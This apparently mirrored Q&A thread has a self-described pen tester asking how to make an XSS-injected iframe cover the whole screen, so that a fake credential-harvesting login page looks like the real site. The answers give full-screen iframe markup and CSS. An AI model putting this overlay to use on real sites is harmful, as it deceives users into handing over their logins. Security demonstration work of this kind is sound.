Creating a full screen iframe

2019-03-15 12:23发布

问题:

I'm currently looking into XSS attacks, with the aim of using them in client demonstrations (I'm a pen tester). I've written a tool that will host a malicious version of a website's login page (that harvests usernames and passwords) and then redirects the victim back to the original website. However, I have been trying to get it to work using iframes instead, as it would look far more convincing as the url won't change.

I've googled about and this seems to be the appropriate code:

<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">

but the iframe created is by no means full screen (on internet explorer and firefox). Here is a screenshot

As you can see, the iframe login page is beneath the "what is your name?" area, thus no where near full screen. I've tried editing the css file of the malicious login page, to include full screen parameters, but this has no effect either.

Does anyone have any solutions? Thanks!

回答1:

Not tested, but try this:

<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

or

<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">


回答2:

This code works:

<html> 
    <head>
        <style type="text/css">
            body
            {
                margin:   0;
                overflow: hidden;
            }

            #iframe1
            {
                height:   100%;
                left:     0px;
                position: absolute;
                top:      0px;
                width:    100%;
            }
        </style>
    </head>

    <body>
        <iframe id="iframe1" src="HERE PLACE YOUR URL" frameborder="0"></iframe>
    </body>
</html>


标签: html iframe xss